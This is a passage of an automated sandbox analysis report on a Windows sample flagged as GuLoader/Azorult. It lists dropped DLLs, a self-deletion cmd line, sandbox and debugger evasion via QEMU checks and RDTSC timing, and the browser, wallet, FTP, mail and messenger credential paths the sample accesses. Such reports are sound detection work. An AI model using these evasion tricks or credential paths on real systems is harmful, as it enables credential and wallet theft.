Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000002308D60 second address: 0000000002308D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000002308DC6 second address: 0000000002308DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000000568D60 second address: 0000000000568D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000000568DC6 second address: 0000000000568DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe TID: 5716 Thread sleep count: 31 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308D58 rdtsc 0_2_02308D58
Is looking for software installed on the system
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe System information queried: ModuleInformation
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308D58 rdtsc 0_2_02308D58
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00401B77 mov ebx, dword ptr fs:[00000030h] 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402D9F mov ebx, dword ptr fs:[00000030h] 0_2_00402D9F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023082BA mov eax, dword ptr fs:[00000030h] 0_2_023082BA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023096CC mov eax, dword ptr fs:[00000030h] 0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230892B mov eax, dword ptr fs:[00000030h] 0_2_0230892B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 mov eax, dword ptr fs:[00000030h] 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304147 mov eax, dword ptr fs:[00000030h] 0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023061E9 mov eax, dword ptr fs:[00000030h] 0_2_023061E9
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023074E9 LdrInitializeThunk, 0_2_023074E9

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Azorult
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.935788645.000000001FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.935761857.000000001FEF8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: X4lLneI8ZK.exe PID: 1012, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History